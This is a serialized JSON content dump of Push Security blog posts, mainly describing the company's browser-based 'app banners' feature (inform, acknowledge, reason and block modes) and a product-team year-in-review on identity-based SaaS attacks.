banner",[],{},{"nodeType":178,"data":247364,"content":247365},{},[247366,247369,247373],{"nodeType":173,"value":180786,"marks":247367,"data":247368},[],{},{"nodeType":173,"value":157079,"marks":247370,"data":247372},[247371],{"type":370},{},{"nodeType":173,"value":247374,"marks":247375,"data":247376}," mode, app banners display your custom message in a thin but noticeable banner at the top of an app’s login or signup pages, providing your security guidance.",[],{},{"nodeType":312,"data":247378,"content":247382},{"target":247379},{"sys":247380},{"id":247381,"type":317,"linkType":318},"5HZV5Zet4JQ2GrNNvm5tJC",[],{"nodeType":235,"data":247384,"content":247385},{},[247386],{"nodeType":173,"value":247387,"marks":247388,"data":247389},"App banner with acknowledgement required",[],{},{"nodeType":178,"data":247391,"content":247392},{},[247393,247396,247400],{"nodeType":173,"value":180786,"marks":247394,"data":247395},[],{},{"nodeType":173,"value":157087,"marks":247397,"data":247399},[247398],{"type":370},{},{"nodeType":173,"value":247401,"marks":247402,"data":247403}," mode, app banners display a larger centrally placed banner that requires end-users to click a button acknowledging your message before proceeding to use the app.",[],{},{"nodeType":178,"data":247405,"content":247406},{},[247407],{"nodeType":173,"value":247408,"marks":247409,"data":247410},"This mode can be useful for requiring that users attest to understanding a security policy or best practice when using an app, such as GenAI apps.",[],{},{"nodeType":312,"data":247412,"content":247415},{"target":247413},{"sys":247414},{"id":220498,"type":317,"linkType":318},[],{"nodeType":235,"data":247417,"content":247418},{},[247419],{"nodeType":173,"value":247420,"marks":247421,"data":247422},"App banner with reason required",[],{},{"nodeType":178,"data":247424,"content":247425},{},[247426,247429,247433],{"nodeType":173,"value":180786,"marks":247427,"data":247428},[],{},{"nodeType":173,"value":157095,"marks":247430,"data":247432},[247431],{"type":370},{},{"nodeType":173,"value":247434,"marks":247435,"data":247436}," mode, employees must submit a reason for using an app by typing it into a field on the banner message. We think of this as a “soft block” that adds meaningful friction without preventing an employee from doing important work when it’s absolutely necessary.",[],{},{"nodeType":178,"data":247438,"content":247439},{},[247440],{"nodeType":173,"value":247441,"marks":247442,"data":247443},"Reason mode is designed for situations where you want specific apps to be used only in limited circumstances — for example, if an employee needs to use an unapproved app in order to collaborate with a customer or other business partner.",[],{},{"nodeType":312,"data":247445,"content":247448},{"target":247446},{"sys":247447},{"id":189681,"type":317,"linkType":318},[],{"nodeType":235,"data":247450,"content":247451},{},[247452],{"nodeType":173,"value":247453,"marks":247454,"data":247455},"Block users from logging in or signing up",[],{},{"nodeType":178,"data":247457,"content":247458},{},[247459,247462,247467,247471,247476,247480,247488],{"nodeType":173,"value":180786,"marks":247460,"data":247461},[],{},{"nodeType":173,"value":247463,"marks":247464,"data":247466},"Block ",[247465],{"type":370},{},{"nodeType":173,"value":247468,"marks":247469,"data":247470},"mode",[],{},{"nodeType":173,"value":247472,"marks":247473,"data":247475},",",[247474],{"type":370},{},{"nodeType":173,"value":247477,"marks":247478,"data":247479}," employees will see a larger banner covering the center of the page that prevents them from logging in or signing up to the app. Optionally, you can allow them to ask for an exception using a request field on the banner. Their request will be emitted as part of a ",[],{},{"nodeType":186,"data":247481,"content":247483},{"uri":247482},"https://pushsecurity.redoc.ly/webhooks-v1#operation/app-banner-event",[247484],{"nodeType":173,"value":247485,"marks":247486,"data":247487},"webhook event",[],{},{"nodeType":173,"value":1477,"marks":247489,"data":247490},[],{},{"nodeType":178,"data":247492,"content":247493},{},[247494],{"nodeType":173,"value":247495,"marks":247496,"data":247497},"Block mode is designed for situations where an app is not approved for general use, unless in exceptional circumstances. ",[],{},{"nodeType":312,"data":247499,"content":247502},{"target":247500},{"sys":247501},{"id":157131,"type":317,"linkType":318},[],{"nodeType":169,"data":247504,"content":247505},{},[247506],{"nodeType":173,"value":247507,"marks":247508,"data":247509},"How our customers are using app banners",[],{},{"nodeType":178,"data":247511,"content":247512},{},[247513],{"nodeType":173,"value":247514,"marks":247515,"data":247516},"Here’s how one of our customers, Christina Kokoros, IT operations manager at Tray.io, has used app banners to tackle SaaS sprawl:  ",[],{},{"nodeType":3769,"data":247518,"content":247519},{},[247520,247527],{"nodeType":178,"data":247521,"content":247522},{},[247523],{"nodeType":173,"value":247524,"marks":247525,"data":247526},"“When the banners feature was implemented in Push, we used it to set up an acknowledgement banner to enhance our messaging around consolidation of our whiteboarding apps.\"",[],{},{"nodeType":178,"data":247528,"content":247529},{},[247530],{"nodeType":173,"value":247531,"marks":247532,"data":247533},"“We saw an almost immediate uptick in views of other communications and in questions to the team on the project. We could also see the drop off of logins of to-be deprecated apps via Push, which was an added bonus. Definitely will be adding this to comms plans for future IT projects.”",[],{},{"nodeType":169,"data":247535,"content":247536},{},[247537],{"nodeType":173,"value":247538,"marks":247539,"data":247540},"How do you set the controls?",[],{},{"nodeType":178,"data":247542,"content":247543},{},[247544],{"nodeType":173,"value":247545,"marks":247546,"data":247547},"You can enable app banners on a per-app basis via the Push admin console. Select an app, choose the mode (Inform, Acknowledge, or Reason), and then write your custom message.",[],{},{"nodeType":312,"data":247549,"content":247553},{"target":247550},{"sys":247551},{"id":247552,"type":317,"linkType":318},"50qEzofi6i36lrZxhrntoH",[],{"nodeType":178,"data":247555,"content":247556},{},[247557],{"nodeType":173,"value":247558,"marks":247559,"data":247560},"Admins can preview the message right in their browser before publishing.",[],{},{"nodeType":178,"data":247562,"content":247563},{},[247564],{"nodeType":173,"value":247565,"marks":247566,"data":247567},"Push also emits webhooks for app banner activity so you can track when banners were shown, acknowledged, received a submitted reason for usage, etc.",[],{},{"nodeType":178,"data":247569,"content":247570},{},[247571,247575,247584],{"nodeType":173,"value":247572,"marks":247573,"data":247574},"Learn more in this Help Center ",[],{},{"nodeType":1698,"data":247576,"content":247579},{"target":247577},{"sys":247578},{"id":2466,"type":317,"linkType":318},[247580],{"nodeType":173,"value":247581,"marks":247582,"data":247583},"article",[],{},{"nodeType":173,"value":1477,"marks":247585,"data":247586},[],{},{"nodeType":169,"data":247588,"content":247589},{},[247590],{"nodeType":173,"value":247591,"marks":247592,"data":247593},"Can you track app usage too?",[],{},{"nodeType":178,"data":247595,"content":247596},{},[247597],{"nodeType":173,"value":247598,"marks":247599,"data":247600},"Yes. As well as controlling what apps employees use, and how they use them, you can also use Push to track the work apps being used across your organization.",[],{},{"nodeType":178,"data":247602,"content":247603},{},[247604,247608,247615],{"nodeType":173,"value":247605,"marks":247606,"data":247607},"Cloud app logins is one of the event types the Push browser agent observes. You can build automations using this data with our ",[],{},{"nodeType":186,"data":247609,"content":247610},{"uri":2333},[247611],{"nodeType":173,"value":247612,"marks":247613,"data":247614},"API and webhooks",[],{},{"nodeType":173,"value":2340,"marks":247616,"data":247617},[],{},{"nodeType":178,"data":247619,"content":247620},{},[247621],{"nodeType":173,"value":247622,"marks":247623,"data":247624},"Common use cases include: discovering shadow IT, maintaining a SaaS app inventory for third-party risk management, and making sure employees are offboarded from all work apps when they leave your business.   ",[],{},{"nodeType":169,"data":247626,"content":247627},{},[247628],{"nodeType":173,"value":93499,"marks":247629,"data":247630},[],{},{"nodeType":178,"data":247632,"content":247633},{},[247634,247637,247643],{"nodeType":173,"value":196934,"marks":247635,"data":247636},[],{},{"nodeType":186,"data":247638,"content":247639},{"uri":114457},[247640],{"nodeType":173,"value":88194,"marks":247641,"data":247642},[],{},{"nodeType":173,"value":247644,"marks":247645,"data":247646},". We’ll be happy to show you this feature along with how we discover all the apps your employees are using and how we detect vulnerable identities. ",[],{},{"entries":247648},{"inline":247649,"hyperlink":247650,"block":247653},[],[247651],{"sys":247652,"__typename":6655,"title":6691,"slug":6692,"articleId":6693},{"id":2466},[247654,247661,247664,247672,247679,247682,247685],{"sys":247655,"__typename":5345,"title":247656,"caption":118,"layoutMode":118,"file":247657},{"id":245394},"ChatGPT app banner",{"url":247658,"width":247659,"height":247660},"https://images.ctfassets.net/y1cdw1ablpvd/6P0NtIksCCnzqw3fj06L8k/1e50525c8f05c0a8eaaf01a4c5e7d370/Extension_-_inline_security_alert-min.png",1218,876,{"sys":247662,"__typename":15269,"type":112637,"ctaText":247663,"buttonLabel":93499,"buttonColour":15273,"buttonUrl":118},{"id":246120},"Check out all of our features, including app banners and more",{"sys":247665,"__typename":5345,"title":247666,"caption":247667,"layoutMode":118,"file":247668},{"id":247381},"App banner published example - KB 10106","App banner in Inform mode",{"url":247669,"width":247670,"height":247671},"https://images.ctfassets.net/y1cdw1ablpvd/24WVmuX8mMHYZMWmsY8bFx/1fb45ad11f5c3d58625cbf823897835b/banner_branded_inform.png",1273,716,{"sys":247673,"__typename":5345,"title":247674,"caption":247675,"layoutMode":118,"file":247676},{"id":220498},"App banner - Acknowledge mode - KB 10106","App banner in Acknowledge mode",{"url":247677,"width":247670,"height":247678},"https://images.ctfassets.net/y1cdw1ablpvd/76MG2m9vO4t3Am4SPyylqJ/8a9d2aa7af36119e465715c194927dcc/banner_branded_acknowledge.png",721,{"sys":247680,"__typename":5345,"title":245991,"caption":245992,"layoutMode":118,"file":247681},{"id":189681},{"url":161702,"width":6852,"height":5400},{"sys":247683,"__typename":5345,"title":173201,"caption":173202,"layoutMode":118,"file":247684},{"id":157131},{"url":173204,"width":173205,"height":173206},{"sys":247686,"__typename":5345,"title":247687,"caption":118,"layoutMode":118,"file":247688},{"id":247552},"App banner - config slideout - KB 10106",{"url":247689,"width":220981,"height":247690},"https://images.ctfassets.net/y1cdw1ablpvd/2jY4YVOJ0ojTggWdzAy5BZ/c3101236c338c926991ca599cdd233fa/app_banner_slideout_20260130.png",1724,"content:blog:control-which-cloud-apps-employees-are-using-your-way.json","blog/control-which-cloud-apps-employees-are-using-your-way.json","blog/control-which-cloud-apps-employees-are-using-your-way",{"_path":247695,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":247696,"summary":247698,"title":247269,"subtitle":118,"metaTitle":247709,"synopsis":247270,"hashTags":118,"publishedDate":247271,"slug":247272,"tagsCollection":247710,"relatedBlogPostsCollection":247716,"ogImage":248813,"authorsCollection":248815,"content":248819,"_id":249221,"_type":5439,"_source":5440,"_file":249222,"_stem":249223,"_extension":5439},"/blog/dev-diary-phishing-prevention-behind-the-scenes",{"id":246837,"publishedAt":247697},"2024-05-15T09:40:19.153Z",{"json":247699},{"data":247700,"content":247701,"nodeType":165},{},[247702],{"data":247703,"content":247704,"nodeType":178},{},[247705],{"data":247706,"marks":247707,"value":247708,"nodeType":173},{},[],"Behind the scenes view of designing and developing our latest feature, SSO password protection, preventing SSO password use outside of the official login page to stop credential phishing for high-risk accounts. ","Behind the scenes of our SSO password protection feature",{"items":247711},[247712,247714],{"sys":247713,"name":18399},{"id":18398},{"sys":247715,"name":26137},{"id":26136},{"items":247717},[247718,248192,248361],{"__typename":1528,"sys":247719,"content":247720,"title":236248,"synopsis":236249,"hashTags":118,"publishedDate":236250,"slug":236251,"tagsCollection":248182,"authorsCollection":248188},{"id":189461},{"json":247721},{"data":247722,"content":247723,"nodeType":165},{},[247724,247730,247735,247741,247747,247760,247789,247795,247802,247807,247820,247827,247832,247838,247844,247850,247856,247863,247869,247884,247897,247902,247908,247923,247940,247946,247966,247972,247993,248006,248012,248029,248035,248100,248106,248119,248125,248131,248137,248143,248156,248161,248167],{"data":247725,"content":247726,"nodeType":178},{},[247727],{"data":247728,"marks":247729,"value":37,"nodeType":173},{},[],{"data":247731,"content":247734,"nodeType":312},{"target":247732},{"sys":247733},{"id":235737,"type":317,"linkType":318},[],{"data":247736,"content":247737,"nodeType":178},{},[247738],{"data":247739,"marks":247740,"value":235745,"nodeType":173},{},[],{"data":247742,"content":247743,"nodeType":178},{},[247744],{"data":247745,"marks":247746,"value":235752,"nodeType":173},{},[],{"data":247748,"content":247749,"nodeType":178},{},[247750,247753,247757],{"data":247751,"marks":247752,"value":235759,"nodeType":173},{},[],{"data":247754,"marks":247755,"value":235764,"nodeType":173},{},[247756],{"type":370},{"data":247758,"marks":247759,"value":39946,"nodeType":173},{},[],{"data":247761,"content":247762,"nodeType":250},{},[247763,247776],{"data":247764,"content":247765,"nodeType":254},{},[247766],{"data":247767,"content":247768,"nodeType":178},{},[247769,247773],{"data":247770,"marks":247771,"value":235781,"nodeType":173},{},[247772],{"type":370},{"data":247774,"marks":247775,"value":235785,"nodeType":173},{},[],{"data":247777,"content":247778,"nodeType":254},{},[247779],{"data":247780,"content":247781,"nodeType":178},{},[247782,247786],{"data":247783,"marks":247784,"value":235796,"nodeType":173},{},[247785],{"type":370},{"data":247787,"marks":247788,"value":235800,"nodeType":173},{},[],{"data":247790,"content":247791,"nodeType":178},{},[247792],{"data":247793,"marks":247794,"value":235807,"nodeType":173},{},[],{"data":247796,"content":247797,"nodeType":178},{},[247798],{"data":247799,"marks":247800,"value":235815,"nodeType":173},{},[247801],{"type":370},{"data":247803,"content":247806,"nodeType":312},{"target":247804},{"sys":247805},{"id":227773,"type":317,"linkType":318},[],{"data":247808,"content":247809,"nodeType":178},{},[247810,247813,247817],{"data":247811,"marks":247812,"value":235827,"nodeType":173},{},[],{"data":247814,"marks":247815,"value":125683,"nodeType":173},{},[247816],{"type":370},{"data":247818,"marks":247819,"value":235835,"nodeType":173},{},[],{"data":247821,"content":247822,"nodeType":178},{},[247823],{"data":247824,"marks":247825,"value":235843,"nodeType":173},{},[247826],{"type":370},{"data":247828,"content":247831,"nodeType":312},{"target":247829},{"sys":247830},{"id":235848,"type":317,"linkType":318},[],{"data":247833,"content":247834,"nodeType":235},{},[247835],{"data":247836,"marks":247837,"value":235856,"nodeType":173},{},[],{"data":247839,"content":247840,"nodeType":178},{},[247841],{"data":247842,"marks":247843,"value":235863,"nodeType":173},{},[],{"data":247845,"content":247846,"nodeType":178},{},[247847],{"data":247848,"marks":247849,"value":235870,"nodeType":173},{},[],{"data":247851,"content":247852,"nodeType":178},{},[247853],{"data":247854,"marks":247855,"value":235877,"nodeType":173},{},[],{"data":247857,"content":247858,"nodeType":178},{},[247859],{"data":247860,"marks":247861,"value":235885,"nodeType":173},{},[247862],{"type":370},{"data":247864,"content":247865,"nodeType":178},{},[247866],{"data":247867,"marks":247868,"value":235892,"nodeType":173},{},[],{"data":247870,"content":247871,"nodeType":178},{},[247872,247875,247881],{"data":247873,"marks":247874,"value":196087,"nodeType":173},{},[],{"data":247876,"content":247877,"nodeType":186},{"uri":183466},[247878],{"data":247879,"marks":247880,"value":155030,"nodeType":173},{},[],{"data":247882,"marks":247883,"value":196097,"nodeType":173},{},[],{"data":247885,"content":247886,"nodeType":178},{},[247887,247890,247894],{"data":247888,"marks":247889,"value":235914,"nodeType":173},{},[],{"data":247891,"marks":247892,"value":235919,"nodeType":173},{},[247893],{"type":370},{"data":247895,"marks":247896,"value":235923,"nodeType":173},{},[],{"data":247898,"content":247901,"nodeType":312},{"target":247899},{"sys":247900},{"id":24862,"type":317,"linkType":318},[],{"data":247903,"content":247904,"nodeType":178},{},[247905],{"data":247906,"marks":247907,"value":235935,"nodeType":173},{},[],{"data":247909,"content":247910,"nodeType":178},{},[247911,247914,247920],{"data":247912,"marks":247913,"value":235942,"nodeType":173},{},[],{"data":247915,"content":247916,"nodeType":186},{"uri":114007},[247917],{"data":247918,"marks":247919,"value":235949,"nodeType":173},{},[],{"data":247921,"marks":247922,"value":235953,"nodeType":173},{},[],{"data":247924,"content":247925,"nodeType":178},{},[247926,247929,247937],{"data":247927,"marks":247928,"value":235960,"nodeType":173},{},[],{"data":247930,"content":247933,"nodeType":1698},{"target":247931},{"sys":247932},{"id":2405,"type":317,"linkType":318},[247934],{"data":247935,"marks":247936,"value":21642,"nodeType":173},{},[],{"data":247938,"marks":247939,"value":1477,"nodeType":173},{},[],{"data":247941,"content":247942,"nodeType":235},{},[247943],{"data":247944,"marks":247945,"value":235978,"nodeType":173},{},[],{"data":247947,"content":247948,"nodeType":178},{},[247949,247952,247956,247959,247963],{"data":247950,"marks":247951,"value":235985,"nodeType":173},{},[],{"data":247953,"marks":247954,"value":182376,"nodeType":173},{},[247955],{"type":370},{"data":247957,"marks":247958,"value":933,"nodeType":173},{},[],{"data":247960,"marks":247961,"value":235997,"nodeType":173},{},[247962],{"type":370},{"data":247964,"marks":247965,"value":236001,"nodeType":173},{},[],{"data":247967,"content":247968,"nodeType":178},{},[247969],{"data":247970,"marks":247971,"value":236008,"nodeType":173},{},[],{"data":247973,"content":247974,"nodeType":250},{},[247975,247984],{"data":247976,"content":247977,"nodeType":254},{},[247978],{"data":247979,"content":247980,"nodeType":178},{},[247981],{"data":247982,"marks":247983,"value":236021,"nodeType":173},{},[],{"data":247985,"content":247986,"nodeType":254},{},[247987],{"data":247988,"content":247989,"nodeType":178},{},[247990],{"data":247991,"marks":247992,"value":236031,"nodeType":173},{},[],{"data":247994,"content":247995,"nodeType":178},{},[247996,247999,248003],{"data":247997,"marks":247998,"value":236038,"nodeType":173},{},[],{"data":248000,"marks":248001,"value":236043,"nodeType":173},{},[248002],{"type":1646},{"data":248004,"marks":248005,"value":236047,"nodeType":173},{},[],{"data":248007,"content":248008,"nodeType":235},{},[248009],{"data":248010,"marks":248011,"value":236054,"nodeType":173},{},[],{"data":248013,"content":248014,"nodeType":178},{},[248015,248018,248026],{"data":248016,"marks":248017,"value":236061,"nodeType":173},{},[],{"data":248019,"content":248022,"nodeType":1698},{"target":248020},{"sys":248021},{"id":202170,"type":317,"linkType":318},[248023],{"data":248024,"marks":248025,"value":195823,"nodeType":173},{},[],{"data":248027,"marks":248028,"value":236073,"nodeType":173},{},[],{"data":248030,"content":248031,"nodeType":178},{},[248032],{"data":248033,"marks":248034,"value":236080,"nodeType":173},{},[],{"data":248036,"content":248037,"nodeType":250},{},[248038,248058],{"data":248039,"content":248040,"nodeType":254},{},[248041],{"data":248042,"content":248043,"nodeType":178},{},[248044,248047,248055],{"data":248045,"marks":248046,"value":236093,"nodeType":173},{},[],{"data":248048,"content":248051,"nodeType":1698},{"target":248049},{"sys":248050},{"id":202170,"type":317,"linkType":318},[248052],{"data":248053,"marks":248054,"value":236102,"nodeType":173},{},[],{"data":248056,"marks":248057,"value":1477,"nodeType":173},{},[],{"data":248059,"content":248060,"nodeType":254},{},[248061],{"data":248062,"content":248063,"nodeType":178},{},[248064,248067,248075,248078,248086,248089,248097],{"data":248065,"marks":248066,"value":236115,"nodeType":173},{},[],{"data":248068,"content":248071,"nodeType":1698},{"target":248069},{"sys":248070},{"id":228244,"type":317,"linkType":318},[248072],{"data":248073,"marks":248074,"value":63256,"nodeType":173},{},[],{"data":248076,"marks":248077,"value":236127,"nodeType":173},{},[],{"data":248079,"content":248082,"nodeType":1698},{"target":248080},{"sys":248081},{"id":236132,"type":317,"linkType":318},[248083],{"data":248084,"marks":248085,"value":226380,"nodeType":173},{},[],{"data":248087,"marks":248088,"value":933,"nodeType":173},{},[],{"data":248090,"content":248093,"nodeType":1698},{"target":248091},{"sys":248092},{"id":236144,"type":317,"linkType":318},[248094],{"data":248095,"marks":248096,"value":226391,"nodeType":173},{},[],{"data":248098,"marks":248099,"value":236152,"nodeType":173},{},[],{"data":248101,"content":248102,"nodeType":235},{},[248103],{"data":248104,"marks":248105,"value":236159,"nodeType":173},{},[],{"data":248107,"content":248108,"nodeType":178},{},[248109,248112,248116],{"data":248110,"marks":248111,"value":236166,"nodeType":173},{},[],{"data":248113,"marks":248114,"value":236171,"nodeType":173},{},[248115],{"type":370},{"data":248117,"marks":248118,"value":236175,"nodeType":173},{},[],{"data":248120,"content":248121,"nodeType":178},{},[248122],{"data":248123,"marks":248124,"value":236182,"nodeType":173},{},[],{"data":248126,"content":248127,"nodeType":178},{},[248128],{"data":248129,"marks":248130,"value":236189,"nodeType":173},{},[],{"data":248132,"content":248133,"nodeType":178},{},[248134],{"data":248135,"marks":248136,"value":236196,"nodeType":173},{},[],{"data":248138,"content":248139,"nodeType":178},{},[248140],{"data":248141,"marks":248142,"value":236203,"nodeType":173},{},[],{"data":248144,"content":248145,"nodeType":178},{},[248146,248149,248153],{"data":248147,"marks":248148,"value":236210,"nodeType":173},{},[],{"data":248150,"marks":248151,"value":236215,"nodeType":173},{},[248152],{"type":370},{"data":248154,"marks":248155,"value":236219,"nodeType":173},{},[],{"data":248157,"content":248160,"nodeType":312},{"target":248158},{"sys":248159},{"id":236224,"type":317,"linkType":318},[],{"data":248162,"content":248163,"nodeType":235},{},[248164],{"data":248165,"marks":248166,"value":71801,"nodeType":173},{},[],{"data":248168,"content":248169,"nodeType":178},{},[248170,248173,248179],{"data":248171,"marks":248172,"value":114452,"nodeType":173},{},[],{"data":248174,"content":248175,"nodeType":186},{"uri":473},[248176],{"data":248177,"marks":248178,"value":88194,"nodeType":173},{},[],{"data":248180,"marks":248181,"value":236247,"nodeType":173},{},[],{"items":248183},[248184,248186],{"sys":248185,"name":509},{"id":508},{"sys":248187,"name":18399},{"id":18398},{"items":248189},[248190],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":248191},{"url":516},{"__typename":1528,"sys":248193,"content":248194,"title":220517,"synopsis":220518,"hashTags":118,"publishedDate":220519,"slug":220520,"tagsCollection":248353,"authorsCollection":248357},{"id":220337},{"json":248195},{"data":248196,"content":248197,"nodeType":165},{},[248198,248204,248234,248240,248253,248258,248273,248279,248292,248297,248312,248318,248331,248336],{"data":248199,"content":248200,"nodeType":235},{},[248201],{"data":248202,"marks":248203,"value":220348,"nodeType":173},{},[],{"data":248205,"content":248206,"nodeType":250},{},[248207,248216,248225],{"data":248208,"content":248209,"nodeType":254},{},[248210],{"data":248211,"content":248212,"nodeType":178},{},[248213],{"data":248214,"marks":248215,"value":220361,"nodeType":173},{},[],{"data":248217,"content":248218,"nodeType":254},{},[248219],{"data":248220,"content":248221,"nodeType":178},{},[248222],{"data":248223,"marks":248224,"value":220371,"nodeType":173},{},[],{"data":248226,"content":248227,"nodeType":254},{},[248228],{"data":248229,"content":248230,"nodeType":178},{},[248231],{"data":248232,"marks":248233,"value":220381,"nodeType":173},{},[],{"data":248235,"content":248236,"nodeType":235},{},[248237],{"data":248238,"marks":248239,"value":220361,"nodeType":173},{},[],{"data":248241,"content":248242,"nodeType":178},{},[248243,248246,248250],{"data":248244,"marks":248245,"value":220394,"nodeType":173},{},[],{"data":248247,"marks":248248,"value":220399,"nodeType":173},{},[248249],{"type":370},{"data":248251,"marks":248252,"value":220403,"nodeType":173},{},[],{"data":248254,"content":248257,"nodeType":312},{"target":248255},{"sys":248256},{"id":220408,"type":317,"linkType":318},[],{"data":248259,"content":248260,"nodeType":178},{},[248261,248264,248270],{"data":248262,"marks":248263,"value":37,"nodeType":173},{},[],{"data":248265,"content":248266,"nodeType":186},{"uri":220418},[248267],{"data":248268,"marks":248269,"value":18605,"nodeType":173},{},[],{"data":248271,"marks":248272,"value":37,"nodeType":173},{},[],{"data":248274,"content":248275,"nodeType":235},{},[248276],{"data":248277,"marks":248278,"value":220432,"nodeType":173},{},[],{"data":248280,"content":248281,"nodeType":178},{},[248282,248285,248289],{"data":248283,"marks":248284,"value":65284,"nodeType":173},{},[],{"data":248286,"marks":248287,"value":220443,"nodeType":173},{},[248288],{"type":370},{"data":248290,"marks":248291,"value":220447,"nodeType":173},{},[],{"data":248293,"content":248296,"nodeType":312},{"target":248294},{"sys":248295},{"id":220452,"type":317,"linkType":318},[],{"data":248298,"content":248299,"nodeType":178},{},[248300,248303,248309],{"data":248301,"marks":248302,"value":37,"nodeType":173},{},[],{"data":248304,"content":248305,"nodeType":186},{"uri":220462},[248306],{"data":248307,"marks":248308,"value":220467,"nodeType":173},{},[],{"data":248310,"marks":248311,"value":37,"nodeType":173},{},[],{"data":248313,"content":248314,"nodeType":235},{},[248315],{"data":248316,"marks":248317,"value":220477,"nodeType":173},{},[],{"data":248319,"content":248320,"nodeType":178},{},[248321,248324,248328],{"data":248322,"marks":248323,"value":220484,"nodeType":173},{},[],{"data":248325,"marks":248326,"value":220489,"nodeType":173},{},[248327],{"type":370},{"data":248329,"marks":248330,"value":220493,"nodeType":173},{},[],{"data":248332,"content":248335,"nodeType":312},{"target":248333},{"sys":248334},{"id":220498,"type":317,"linkType":318},[],{"data":248337,"content":248338,"nodeType":178},{},[248339,248342,248350],{"data":248340,"marks":248341,"value":37,"nodeType":173},{},[],{"data":248343,"content":248346,"nodeType":1698},{"target":248344},{"sys":248345},{"id":2466,"type":317,"linkType":318},[248347],{"data":248348,"marks":248349,"value":18605,"nodeType":173},{},[],{"data":248351,"marks":248352,"value":37,"nodeType":173},{},[],{"items":248354},[248355],{"sys":248356,"name":18399},{"id":18398},{"items":248358},[248359],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":248360},{"url":19129},{"__typename":1528,"sys":248362,"content":248364,"title":248799,"synopsis":248800,"hashTags":118,"publishedDate":248801,"slug":248802,"tagsCollection":248803,"authorsCollection":248809},{"id":248363},"1uhswJr9ITxnhjIJur8UKL",{"json":248365},{"nodeType":165,"data":248366,"content":248367},{},[248368,248375,248382,248389,248417,248424,248430,248446,248465,248497,248502,248509,248516,248523,248530,248537,248542,248549,248556,248574,248581,248682,248689,248696,248703,248728,248748,248772,248792],{"nodeType":178,"data":248369,"content":248370},{},[248371],{"nodeType":173,"value":248372,"marks":248373,"data":248374},"As we look back at a year of building on the Product team at Push, three big themes stand out:",[],{},{"nodeType":235,"data":248376,"content":248377},{},[248378],{"nodeType":173,"value":248379,"marks":248380,"data":248381},"Cloud identities are increasingly under attack",[],{},{"nodeType":178,"data":248383,"content":248384},{},[248385],{"nodeType":173,"value":248386,"marks":248387,"data":248388},"A big focus for us this year was to deepen our understanding of the landscape of adversarial techniques in the world of emerging SaaS-first attacks that don’t touch the endpoint or network, and it’s clear they are becoming both more prevalent and more advanced.",[],{},{"nodeType":178,"data":248390,"content":248391},{},[248392,248395,248401,248405,248413],{"nodeType":173,"value":37,"marks":248393,"data":248394},[],{},{"nodeType":186,"data":248396,"content":248397},{"uri":182804},[248398],{"nodeType":173,"value":197416,"marks":248399,"data":248400},[],{},{"nodeType":173,"value":248402,"marks":248403,"data":248404}," is the internet’s most prolific attack vector today. In December 2023, ",[],{},{"nodeType":186,"data":248406,"content":248408},{"uri":248407},"https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023-state-of-cybercrime",[248409],{"nodeType":173,"value":248410,"marks":248411,"data":248412},"Microsoft reported",[],{},{"nodeType":173,"value":248414,"marks":248415,"data":248416}," that attempted password attacks against Entra have increased to an average of 4,000 per second. This is a tenfold increase from the same time period in 2022.",[],{},{"nodeType":178,"data":248418,"content":248419},{},[248420],{"nodeType":173,"value":248421,"marks":248422,"data":248423},"To help address this, our app helps you quickly determine which accounts are at highest risk of attack by highlighting which use passwords (as opposed to SSO), have a weak or leaked password, and don’t have MFA. We built a dashboard that brings all this together, allowing you to quickly zero in on at-risk accounts — you can even filter it by the apps that house sensitive data to have a focused starting place.",[],{},{"nodeType":312,"data":248425,"content":248429},{"target":248426},{"sys":248427},{"id":248428,"type":317,"linkType":318},"3tuUzr0DOhxUs6ytxCHUcg",[],{"nodeType":178,"data":248431,"content":248432},{},[248433,248436,248443],{"nodeType":173,"value":37,"marks":248434,"data":248435},[],{},{"nodeType":186,"data":248437,"content":248438},{"uri":220418},[248439],{"nodeType":173,"value":248440,"marks":248441,"data":248442},"Explore the dashboard >>",[],{},{"nodeType":173,"value":37,"marks":248444,"data":248445},[],{},{"nodeType":178,"data":248447,"content":248448},{},[248449,248453,248461],{"nodeType":173,"value":248450,"marks":248451,"data":248452},"We also spent the last year going deep into emerging methods that are powerful but lesser-known, publishing our ",[],{},{"nodeType":1698,"data":248454,"content":248457},{"target":248455},{"sys":248456},{"id":208338,"type":317,"linkType":318},[248458],{"nodeType":173,"value":88742,"marks":248459,"data":248460},[],{},{"nodeType":173,"value":248462,"marks":248463,"data":248464}," project on Github.",[],{},{"nodeType":178,"data":248466,"content":248467},{},[248468,248472,248481,248485,248493],{"nodeType":173,"value":248469,"marks":248470,"data":248471},"Just a few months after publishing the project, we’ve seen increasingly ",[],{},{"nodeType":1698,"data":248473,"content":248476},{"target":248474},{"sys":248475},{"id":202170,"type":317,"linkType":318},[248477],{"nodeType":173,"value":248478,"marks":248479,"data":248480},"regular headlines",[],{},{"nodeType":173,"value":248482,"marks":248483,"data":248484}," from organizations battling cloud-native attacks that target insecure identities. It’s abundantly clear that we are seeing ",[],{},{"nodeType":186,"data":248486,"content":248488},{"uri":248487},"https://www.ncsc.gov.uk/news/svr-cyber-actors-adapt-tactics-for-initial-cloud-access",[248489],{"nodeType":173,"value":248490,"marks":248491,"data":248492},"real-world attacks",[],{},{"nodeType":173,"value":248494,"marks":248495,"data":248496}," shifting to an organization’s cloud and SaaS attack surface.",[],{},{"nodeType":312,"data":248498,"content":248501},{"target":248499},{"sys":248500},{"id":161889,"type":317,"linkType":318},[],{"nodeType":178,"data":248503,"content":248504},{},[248505],{"nodeType":173,"value":248506,"marks":248507,"data":248508},"As a product, Push will continue to leverage its privileged position in the browser to do even more to prevent and detect identity-based attacks in the coming months. ",[],{},{"nodeType":235,"data":248510,"content":248511},{},[248512],{"nodeType":173,"value":248513,"marks":248514,"data":248515},"Being in the browser is invaluable for securing identities — and we’re going to push the power further",[],{},{"nodeType":178,"data":248517,"content":248518},{},[248519],{"nodeType":173,"value":248520,"marks":248521,"data":248522},"Beyond providing the most reliable telemetry for managing identity security posture, being in the browser means that Push can engage directly with end-users to encourage security best practices.",[],{},{"nodeType":178,"data":248524,"content":248525},{},[248526],{"nodeType":173,"value":248527,"marks":248528,"data":248529},"Over the last year in conversations with customers, we kept hearing a phrase repeated: “I just need to add some guardrails to help employees.”",[],{},{"nodeType":178,"data":248531,"content":248532},{},[248533],{"nodeType":173,"value":248534,"marks":248535,"data":248536},"The idea was born for our most popular feature to date: The app 